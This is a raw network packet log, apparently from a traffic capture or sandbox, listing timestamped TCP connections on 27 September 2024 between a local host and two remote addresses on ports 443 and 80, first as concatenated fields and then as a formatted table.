                                                                                                                                                                Sep 27, 2024 17:42:08.557631016 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.557676077 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.557846069 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.558794975 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.558806896 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.607711077 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.607916117 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.612077951 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.612095118 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.612329960 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.615988970 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.663403988 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008563042 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008663893 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008848906 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008948088 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008965969 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008976936 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008982897 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.083329916 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.083419085 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.084280968 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.089160919 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.273073912 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.820813894 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.820827961 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.820832968 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.133387089 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133430004 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.133497000 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133933067 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133946896 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.136122942 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136131048 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.136198044 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136550903 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136559963 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.506381989 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.506432056 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.507097960 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.511959076 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.630501032 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.630631924 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.632049084 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.632061005 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.632306099 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.633497000 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.639627934 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.639729977 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.640834093 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.640841007 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.641195059 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.641973972 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.675453901 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.687449932 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.733561039 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.733632088 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.848297119 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.848690033 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853568077 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.853636026 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.853701115 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853754997 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853938103 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.858800888 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.208919048 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.208983898 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209008932 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209074020 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209081888 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209151983 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209326982 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209348917 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209363937 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209369898 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209564924 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209569931 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209602118 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209605932 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.492444038 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492506981 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.492588043 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492928982 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492947102 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.538391113 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538430929 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.538568974 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538889885 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538901091 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.569432974 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.569647074 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.570529938 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.575325966 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.803164005 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.803297997 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.910890102 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.911307096 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916249990 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.916333914 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.916357040 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916416883 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916593075 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.921705008 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.961797953 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.961886883 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.963229895 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.963248968 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.963608027 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.964513063 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.007425070 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.032973051 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.033092022 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.034593105 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.034605026 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.034883976 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.036075115 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.083416939 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.384988070 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385109901 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385262966 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385564089 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385624886 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385659933 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385675907 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436295033 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436405897 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436562061 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437064886 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437064886 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437088013 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.437102079 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.610800028 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.610868931 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.611680984 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.616476059 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.789150953 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789239883 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.789347887 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789691925 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789721012 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.839762926 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.841454983 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.870693922 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.870757103 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.870845079 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.871220112 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.992743015 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.992757082 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.039016008 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039028883 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.039122105 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039503098 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039515018 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.351269007 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.351329088 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.352669954 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.358824968 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.780484915 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.780563116 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.782382965 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.782479048 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.782582998 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.782645941 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.783735991 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.783745050 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.783992052 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.784710884 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.784742117 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.784746885 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.784981966 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.785687923 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.827403069 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.827408075 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.897715092 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.898045063 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.906852961 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.906963110 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.907125950 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.907171965 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.907226086 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.913516998 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278204918 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278306007 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278357029 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.278568029 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.278592110 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297646046 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297745943 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297787905 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298091888 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298106909 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.298135042 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298140049 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.523137093 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523179054 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.523250103 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523716927 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523729086 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.649245977 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649286032 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.649384022 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649914026 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649924994 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.764983892 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.765044928 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:21.766148090 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:21.774802923 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.024318933 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.027431011 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.031636000 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.031757116 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.040138006 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.040152073 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.040441990 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.044415951 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.091408968 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.132730961 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.133059978 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.166743040 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.167329073 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.167361975 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.171286106 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.202411890 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.211657047 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.211731911 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.220556974 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.226082087 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.226099968 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.226327896 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.241326094 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.283418894 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496529102 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496629953 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496773958 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496860027 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496872902 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496886969 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496892929 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637058020 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637149096 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637204885 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637552977 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637576103 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637588024 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637593031 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.773118019 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773159027 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.773247957 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773638010 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773648977 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.946219921 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.946280956 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.947155952 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.960441113 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960489035 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.960669994 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960968971 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960982084 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.964999914 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.208220959 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.208340883 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.317091942 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.317522049 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.334357023 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.334441900 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.334587097 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.349920988 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.357475996 CEST8049778185.215.113.16192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2024 17:42:23.357554913 CEST        49778         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:23.366961956 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.367053986 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.368391991 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.368401051 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.368623018 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.369446993 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.415410042 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.531363964 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.531642914 CEST        49780        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.533340931 CEST        49780        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.533351898 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.533751965 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.534758091 CEST        49780        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.575398922 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.838548899 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.838661909 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.838737011 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.838948011 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.838963032 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.838973045 CEST        49779        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:23.838979006 CEST          443      49779  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.999591112 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:23.999689102 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.000377893 CEST        49780        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.000484943 CEST        49780        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.000514984 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.000535965 CEST        49780        443  192.168.2.4      172.67.187.100
